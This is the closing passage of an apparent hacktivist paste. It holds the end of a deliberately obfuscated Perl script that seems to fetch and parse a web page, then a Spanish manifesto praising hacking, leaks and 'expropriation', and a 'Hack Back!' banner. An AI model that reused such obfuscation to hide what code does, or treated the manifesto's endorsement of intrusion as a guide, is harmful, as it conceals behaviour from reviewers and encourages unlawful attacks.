  1219. '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").(
  1220. '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!')
  1221. .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'").
  1222. '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).(
  1223. '['^'(').('`'|',').'-'.('`'|'%').('['^('(')).
  1224. '/`)=~'.('['^'(').'|</'.('['^'+').'>|\\'
  1225. .'\\'.('`'|'.').'|'.('`'|"'").';'.
  1226. '\\$:=~'.('['^'(').'/<.*?>//'
  1227. .('`'|"'").';'.('['^'+').('['^
  1228. ')').('`'|')').('`'|'.').(('[')^
  1229. '/').('{'^'[').'\\$:=~/('.(('{')^
  1230. '(').('`'^'%').('{'^'#').('{'^'/')
  1231. .('`'^'!').'.*?'.('`'^'-').('`'|'%')
  1232. .('['^'#').("\`"| ')').('`'|'#').(
  1233. '`'|'!').('`'| '.').('`'|'/')
  1234. .'..)/'.('[' ^'(').'"})')
  1235. ;$:="\."^ '~';$~='@'
  1236. |'(';$^= ')'^'[';
  1237. $/='`' |'.';
  1238. $,= '('
  1239. EOF
  1240.  
  1241.  
  1242. Nosotras nacimos de la noche.
  1243. en ella vivimos, hackeamos en ella.
  1244.  
  1245. Aquí estamos, somos la dignidad rebelde,
  1246. el corazón olvidado de la Интернет.
  1247.  
  1248. Nuestra lucha es por la memoria y la justicia,
  1249. y el mal gobierno se llena de criminales y asesinos.
  1250.  
  1251. Nuestra lucha es por un trabajo justo y digno,
  1252. y el mal gobierno y las corporaciones compran y venden zero days.
  1253.  
  1254. Para todas el mañana.
  1255. Para nosotras la alegre rebeldía de las filtraciones
  1256. y la expropiación.
  1257.  
  1258. Para todas todo.
  1259. Para nosotras nada.
  1260.  
  1261.  
  1262. Desde las montañas del Sureste Cibernético,
  1263.  
  1264. _ _ _ ____ _ _
  1265. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  1266. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  1267. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  1268. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement